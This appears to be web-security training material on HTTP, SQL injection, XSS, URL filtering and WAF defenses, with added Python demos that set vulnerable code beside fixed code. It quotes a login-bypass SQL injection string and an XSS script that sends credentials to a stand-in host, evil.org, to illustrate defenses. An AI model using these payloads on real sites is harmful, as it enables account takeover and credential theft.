Figure: Client/server access over HTTP/HTTPS. The server's document root (docroot) holds index.html, service.html and an Images directory (device.jpg, icon.jpg); the site is organized into sections such as Enterprise, Professional Documents, Culture Documents and Defense. The client requests a resource such as http://support.huawei.com/enterprise/zh/index.html.

HTTP/HTTPS
An HTTP request packet is formed by the following four parts: request line,
request header, blank line, and request data.
Figure: Format of an HTTP request packet.

    Request line:    <request method> SP <URL> SP <protocol version> CR LF
    Request header:  <header field name>: <value> CR LF
                     ...
                     <header field name>: <value> CR LF
    Blank line:      CR LF
    Request data
Of the request methods, POST is usually described as more secure than GET. The difference is where the parameters travel: GET puts them in the URL of the request line, so they show up in browser history, proxy and server logs, and Referer headers, whereas POST carries them in the request data. Neither method protects the data in transit without HTTPS, and input from both must be validated on the server.
HTTP Response Packet
An HTTP response also consists of three parts: status line, response header,
and response data.
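The following parser, added here as an example and not code from the original slides, splits a raw request or response into exactly the parts described above (request/status line, header lines, blank line, data) and then shows the practical consequence of the GET/POST remark: where a form's parameters end up. The sample messages are constructed for the demonstration; the host name reuses the page's support.huawei.com example, but nothing is sent over the network.

```python
"""Minimal HTTP/1.1 request and response parser (added example)."""
from urllib.parse import parse_qs, urlsplit

CRLF = b"\r\n"


def _split_message(raw: bytes):
    """Split a raw message into (start line, header dict, data).

    Header lines end with CR LF; the first empty line (CR LF CR LF) marks
    the start of the data part, as in the request format figure.
    """
    head, sep, body = raw.partition(CRLF + CRLF)
    if not sep:
        raise ValueError("no blank line separating headers from data")
    lines = head.split(CRLF)
    start_line = lines[0].decode("ascii")
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.decode("latin-1").partition(":")
        if not colon or not name.strip():
            raise ValueError(f"malformed header line: {line!r}")
        headers[name.strip().lower()] = value.strip()
    # Only Content-Length bytes belong to this message; anything beyond that
    # would be the next message on a keep-alive connection.
    length = int(headers.get("content-length", len(body)))
    if length < 0 or length > len(body):
        raise ValueError("Content-Length does not match the data received")
    return start_line, headers, body[:length]


def parse_request(raw: bytes) -> dict:
    """Request line is '<method> SP <URL> SP <protocol version>'."""
    start, headers, body = _split_message(raw)
    method, url, version = start.split(" ", 2)
    return {"method": method, "url": url, "version": version,
            "headers": headers, "body": body}


def parse_response(raw: bytes) -> dict:
    """Status line is '<protocol version> SP <status code> SP <reason>'."""
    start, headers, body = _split_message(raw)
    parts = start.split(" ", 2)
    return {"version": parts[0], "status": int(parts[1]),
            "reason": parts[2] if len(parts) > 2 else "",
            "headers": headers, "body": body}


def form_parameters(req: dict) -> dict:
    """Locate the user-supplied parameters of a request.

    GET parameters travel in the URL of the request line (and so into
    history, logs and Referer headers); POST form parameters travel in
    the data part.
    """
    if req["method"] == "GET":
        raw = urlsplit(req["url"]).query
        where = "request-line"
    elif req["method"] == "POST" and req["headers"].get(
            "content-type", "").startswith("application/x-www-form-urlencoded"):
        raw = req["body"].decode("utf-8")
        where = "data"
    else:
        return {"location": None, "params": {}}
    return {"location": where,
            "params": {k: v[0] for k, v in parse_qs(raw).items()}}


# Constructed sample messages (not captured traffic).
GET_REQUEST = (b"GET /login.jsp?user=tom&password=s3cret HTTP/1.1" + CRLF
               + b"Host: support.huawei.com" + CRLF + CRLF)
POST_REQUEST = (b"POST /login.jsp HTTP/1.1" + CRLF
                + b"Host: support.huawei.com" + CRLF
                + b"Content-Type: application/x-www-form-urlencoded" + CRLF
                + b"Content-Length: 24" + CRLF + CRLF
                + b"user=tom&password=s3cret")
RESPONSE = (b"HTTP/1.1 200 OK" + CRLF
            + b"Content-Type: text/html" + CRLF
            + b"Content-Length: 13" + CRLF + CRLF
            + b"<html></html>")

if __name__ == "__main__":
    for msg in (GET_REQUEST, POST_REQUEST):
        print(form_parameters(parse_request(msg)))
    print(parse_response(RESPONSE)["status"])
```

Running the block prints the same credentials for both requests; the only difference is the `location` field, which is exactly why a GET login form leaks passwords into logs while a POST form does not.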
Basic Procedure for SQL Injection

Figure: SQL injection against /login.jsp. Example (Oracle): the attacker enters ' or '1'='1 in the user name field, or enters ' or '1'='1 in the password field, and the login succeeds.
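To show why the payload in the figure works, here is a login check built by string concatenation next to the same check written with bind parameters. This is an added example, not code from the slides: it uses an in-memory SQLite database with a constructed users table instead of the Oracle database and /login.jsp endpoint of the figure, and it stores passwords in clear text only so that the injected predicate reads exactly as on the page (a real application stores a salted hash). It also shows an edge the figure glosses over: because AND binds tighter than OR, the bare payload only bypasses the check from the password field; from the user name field it needs a trailing comment.

```python
"""SQL injection against a login form: vulnerable query next to its fix (added example)."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: two accounts in an in-memory database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "N0t-guessable!"), ("tom", "tom123")])
    conn.commit()
    return conn


def rendered_sql(username: str, password: str) -> str:
    """The statement the vulnerable code actually sends: input becomes SQL syntax."""
    return ("SELECT id FROM users WHERE username = '" + username
            + "' AND password = '" + password + "'")


def login_vulnerable(conn, username: str, password: str) -> bool:
    """String concatenation: whatever the user types is parsed as part of the query."""
    return conn.execute(rendered_sql(username, password)).fetchone() is not None


def login_safe(conn, username: str, password: str) -> bool:
    """Bind parameters: the driver sends the input as data, never as syntax."""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


# The page's payload.
PAYLOAD = "' or '1'='1"

if __name__ == "__main__":
    db = make_db()
    # Password field: ... AND password = '' or '1'='1'  -> (false) OR true -> every row matches.
    print(rendered_sql("admin", PAYLOAD), login_vulnerable(db, "admin", PAYLOAD))
    # User name field: username = '' or '1'='1' AND password = 'wrong'
    # -> false OR (true AND false) -> no row; the attacker adds a comment to drop the tail.
    print(rendered_sql(PAYLOAD, "wrong"), login_vulnerable(db, PAYLOAD, "wrong"))
    print(rendered_sql(PAYLOAD + "' --", "wrong"), login_vulnerable(db, PAYLOAD + "' --", "wrong"))
    print(login_safe(db, "admin", PAYLOAD), login_safe(db, "tom", "tom123"))
```

The parameterized version is the fix; a WAF signature for `' or '1'='1` only catches this one spelling of the idea.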
XSS has been one of the most common web attack methods in recent years and accounts for a large share of web attacks. Many websites, including Facebook, have been hit by it, and the worm that spread on Sina Weibo, a well-known Chinese company, was also caused by an XSS vulnerability.
In essence, XSS is a way of executing malicious code (usually JavaScript) in the victim's browser. XSS occurs because the website does not strictly filter or encode the data submitted by users before writing it into a page.
Basic cross-site types:
Reflected XSS
Stored XSS
Implementation Procedure for Reflected XSS Attacks

Figure: Participants are the user, the attacker, and the web server or application. Steps readable in the figure: 2. The attacker submits the prepared URL to the user. 5. The attacker's JavaScript is executed in the user's browser. 6. The user's browser sends session tokens to the attacker.

Implementation Procedure for Stored XSS Attacks

Figure: Participants are the user, the attacker, and the web server or application. Steps readable in the figure: 5. The attacker's JavaScript is executed in the user's browser. 6. The user's browser sends session tokens to the attacker.
Example of the Reflected XSS Attacks

Figure: Hacker and User A. 1. The hacker enters the following code in a normal web page:

    <script>
    document.body.innerHTML="<h1>Please Login</h1><form action=http://evil.org/grabpassword.jsp method=post><br>User name:<input type=text name=user><br>Password:<input type=text name=password></p><input type=submit name=login></form>"
    </script>

3. The page contains the code, and a dialog box is displayed ("I bet you haven't seen something like this."); User A wonders "Should I log in again?" 4. The user enters the user name and password, and the submitted information is obtained by the hacker.
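The example below, added here and not taken from the slides or from any web framework, reproduces both XSS types against one page handler: the payload from the figure (the innerHTML-rewriting fake login form) arrives either in a URL parameter (reflected) or from previously saved comments (stored). The two render functions stand in for a server-side page handler, since the page's framework and URLs are not known; all inputs are constructed. The point it shows is the fix the text calls "strict filtering": HTML-encode every user-controlled string at the moment it is written into the page.

```python
"""Reflected and stored XSS next to output encoding that defuses both (added example)."""
import html
from urllib.parse import parse_qs, urlencode

# The injected script from the figure.
PAYLOAD = ('<script>document.body.innerHTML="<h1>Please Login</h1>'
           '<form action=http://evil.org/grabpassword.jsp method=post>'
           'User name:<input type=text name=user>'
           'Password:<input type=text name=password>'
           '<input type=submit name=login></form>"</script>')

# Page template; {name} comes from the query string, {comments} from storage.
PAGE = ("<html><body><p>Hello, {name}</p>"
        "<div id=comments>{comments}</div></body></html>")


def render_vulnerable(query: str, stored_comments) -> str:
    """Writes the query parameter (reflected) and saved comments (stored) into the page as-is."""
    name = parse_qs(query).get("name", [""])[0]
    comments = "".join(f"<p>{c}</p>" for c in stored_comments)
    # str.format does not re-interpret braces inside the substituted values.
    return PAGE.format(name=name, comments=comments)


def render_safe(query: str, stored_comments) -> str:
    """Same page, but every user-controlled string is HTML-escaped at output time."""
    name = html.escape(parse_qs(query).get("name", [""])[0], quote=True)
    comments = "".join(f"<p>{html.escape(c, quote=True)}</p>" for c in stored_comments)
    return PAGE.format(name=name, comments=comments)


def has_active_markup(page: str) -> bool:
    """Crude indicator for the checks below: an unescaped <script> or <form> tag is present."""
    low = page.lower()
    return "<script" in low or "<form " in low


# Reflected: the attacker builds this URL and sends it to the victim (step 2 of the figure).
REFLECTED_QUERY = urlencode({"name": PAYLOAD})
# Stored: the attacker saved the payload earlier; every later visitor receives it.
STORED_COMMENTS = ["nice article", PAYLOAD]

if __name__ == "__main__":
    print(has_active_markup(render_vulnerable(REFLECTED_QUERY, [])))      # reflected, vulnerable
    print(has_active_markup(render_vulnerable("name=tom", STORED_COMMENTS)))  # stored, vulnerable
    print(has_active_markup(render_safe(REFLECTED_QUERY, STORED_COMMENTS)))   # both, encoded
    print(render_safe(REFLECTED_QUERY, [])[:80])
```

Escaping at output time is the right place because the same stored string may be written into HTML, an attribute, or JavaScript, and each context needs its own encoding; escaping once on input cannot know which context it will end up in.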
Each web page on the Internet has a unique identifier, that is, the URL.

    http://www.abcd.com:8080/news/education.aspx?name=tom&age=20
    scheme hostname    [:port] path                query
URL Filtering Principles

Figure: Intranet employees A, B and C reach the Internet through the FW. 3. The browser sends an HTTP GET request. 5. If the request is valid, the request is permitted and the user can access the corresponding website. 6. If the request is invalid, the device can directly close the TCP connection.
URL Classification and Filtering Technology

URL matching modes include prefix matching, suffix matching, keyword matching, and exact matching.

Matching mode | Function | Character string example | Result
Prefix matching | Matches URLs that start with a specified character string. | www.example* | All URLs that start with www.example are matched, including www.example.com and www.example.com/solutions.do.
Suffix matching | Matches all URLs that end with a specified character string. | *aspx | All URLs that end with aspx are matched, including www.example.com/news/solutions.aspx, www.example.com/it/price.aspx and 10.1.1.1/sports/abc.aspx.
URL Filtering Process

Figure: Processing stages are application recognition, protocol decoding, mode matching, filtering (including user-defined category filtering), local cache query, and response.

Overall Process of URL Filtering

Figure: Traffic from the Trust zone to the Untrust zone is either allowed or blocked; if no policy is matched, the action is Allow.
Key Configurations for URL Filtering - URL Categories

Notes from the configuration figure:
- User-defined URL categories.
- If a URL belongs to multiple categories, the FW takes an action based on the action pattern. The action pattern is either Strict or Loose.
- If the URL does not match any blacklist, whitelist, or URL category in the local cache and the remote query function for predefined categories is unavailable, the FW takes the default action.
- Configure the URL blacklist and whitelist.
- The URL filtering level takes effect only on predefined categories. The actions for user-defined categories must be manually configured by the administrator. The default action is Allow.
Malicious URL detection draws on three sources: sandbox interworking, antivirus detection, and low-reputation websites. When the malicious URL detection function is enabled in the URL profile, these sources are checked in sequence.
Application Scenarios of the Web Reputation System

Web Reputation System Processing Flow

Figure: Enterprise intranet traffic to website A and website B passes through the FW to the Internet. Files extracted from the traffic are handed to a cluster manager, which distributes them to detection nodes 1, 2 and 3; a remote server is also shown.
Website Category Divided by Web Reputation

The web reputation function categorizes websites into four categories based on their reputation.
Web Reputation Matching Mode

The web reputation function extracts the host field from the URL of an accessed website and matches that string against the web reputation website categories. The host field can be a domain name or an IP address.

host field format | Level-1 domain name | Example | Matching mode
IP address | N/A | 192.168.10.10 or 192.168.10.10:8080 | The system matches the string directly, without any processing.
Does not contain dots (.) | | example, example-abc, or example123 | The system matches the string directly, without any processing.
Figure: Web reputation configuration steps; the step readable in the figure is "Add credible websites."
The WAF runs a series of security policies on HTTP/HTTPS traffic to protect web applications.
Specifically, the WAF inspects each field of an HTTP packet against rules.
WAF Workflow

The WAF consists of the execution front end, the back-end center system, and the database.

Figure: The front end receives the web configuration, the WAF configurations and the rule configurations, and exports the detection result. Incoming traffic (blacklisted sources, sensitive information submission, server vulnerability attacks, SQL injection/CC attacks, and normal access) passes through a chain of checks: network security check, whitelist check, web service security check, content security check, and web application security check. Only normal access reaches the web application.
WAF Functions

The WAF functions shown are in-depth security defense, high-performance detection, and anti-tampering. Web application input detection covers XSS attacks, SQL injection, command injection, Cookie/Session hijacking, parameter or list tampering, buffer overflow attacks, directory traversal, CSRF attacks, and link theft.
CC Attack Defense

Figure: The CC attack defense module observes a time axis from 00:00:00 to 00:01:00 on which one client issues GET /show.asp?id=1, GET /show.asp?id=2, GET /show.asp?id=3, GET /show.asp?id=4, ... in quick succession.
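As an added example of what the CC attack defense module in the figure has to do (this is not the WAF's code), the detector below keeps a sliding window of request timestamps per client and flags a client whose request count within the window exceeds a threshold. It also counts distinct URLs per client, because the signature of a CC attack in the figure is many requests for a dynamic page with a changing parameter (id=1, id=2, ...), which defeats caching and forces the server to do real work each time. The access log lines, their format (`<client ip> <hh:mm:ss> <method> <path>`), the 60-second window and the threshold of 5 are all constructed for the demonstration.

```python
"""CC (HTTP flood) attack detection with a per-client sliding window (added example)."""
from collections import defaultdict, deque
from datetime import datetime

WINDOW_SECONDS = 60   # constructed: the one-minute axis of the figure
THRESHOLD = 5         # constructed: more than this many requests per window flags the client


def parse_line(line: str):
    """Assumed log format: '<client ip> <hh:mm:ss> <method> <path>'."""
    ip, hms, method, path = line.split()
    t = datetime.strptime(hms, "%H:%M:%S")
    return ip, t.hour * 3600 + t.minute * 60 + t.second, method, path


def detect_cc(lines, window=WINDOW_SECONDS, threshold=THRESHOLD):
    """Return {ip: {"flagged_at", "requests", "distinct_urls"}} for clients whose
    request count within any `window` seconds exceeds `threshold`.
    Lines must be in time order (as an access log is)."""
    recent = defaultdict(deque)   # ip -> timestamps still inside the window
    urls = defaultdict(set)       # ip -> distinct URLs requested
    flagged = {}
    for line in lines:
        ip, t, _method, path = parse_line(line)
        q = recent[ip]
        q.append(t)
        while t - q[0] >= window:   # slide the window: drop timestamps older than `window`
            q.popleft()
        urls[ip].add(path)
        if len(q) > threshold and ip not in flagged:
            flagged[ip] = {"flagged_at": t, "requests": len(q),
                           "distinct_urls": len(urls[ip])}
    return flagged


# Constructed access log: 10.1.1.5 floods show.asp with a changing id; 10.1.1.6 browses normally.
ACCESS_LOG = [
    "10.1.1.5 00:00:00 GET /show.asp?id=1",
    "10.1.1.6 00:00:03 GET /index.html",
    "10.1.1.5 00:00:05 GET /show.asp?id=2",
    "10.1.1.5 00:00:10 GET /show.asp?id=3",
    "10.1.1.5 00:00:15 GET /show.asp?id=4",
    "10.1.1.6 00:00:20 GET /news/solutions.aspx",
    "10.1.1.5 00:00:20 GET /show.asp?id=5",
    "10.1.1.5 00:00:25 GET /show.asp?id=6",
    "10.1.1.5 00:00:30 GET /show.asp?id=7",
    "10.1.1.6 00:00:59 GET /it/price.aspx",
]

if __name__ == "__main__":
    print(detect_cc(ACCESS_LOG))
```

A fixed threshold like this is the simplest form of the defense; the self-learning modeling described next replaces the constant with a per-URL baseline learned from normal traffic, and a high distinct-URL count for one client is a useful secondary signal when attackers keep the rate low.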
Self-Learning Modeling and Whitelist Defense

Figure: The WAF's self-learning modeling; its output is the detection whitelist.

High-Performance Detection

Figure: The WAF's high-performance detection module.

Anti-Tampering

Figure: The WAF's anti-tampering module works together with a cache module.

Automatic Detection Application

Figure: User 1 and User 2 obtain page content through the WAF from the cache module.
WAF Deployment Mode (1/2)

Figure: WAF components: CC attack defense module, high-performance delivery engine, self-learning engine, application whitelist, and blacklist signature database.

Figure: Two deployment modes shown against the OSI layers. In proxy/transparent transmission mode, traffic that matches the IP address and port number of the site to be protected is handled at the application layer (above the presentation, session and transport layers), while traffic that does not match the protected site's IP address and port number is passed through at the transport and network layers. In data packet forwarding mode, traffic that matches the IP address of the site to be protected is inspected, MAC address learning takes place at the data link layer, and traffic that does not match the protected site's IP address is forwarded unchanged.
Quiz

1.
A. Client
B. Server
C. Application software
D. Communication channel

2.
A. Reflected XSS
B. Anonymous XSS
C. Stored XSS
D. Injection XSS
Summary
Both the IPS and the WAF can detect attacks carried over HTTP, but the two functions differ. For example, in terms of attack sample identification, the IPS identifies samples by dictionary or keyword matching, which is not flexible. By contrast, the WAF supports flexible syntax such as regular-expression matching, length calculation, and reverse calculation for object matching, and has multiple complex decoding capabilities.
As for the working mode, the WAF supports code conversion (decoding the request before matching), whereas the IPS supports static identification only. Therefore, the WAF is more powerful than the IPS in web application attack defense.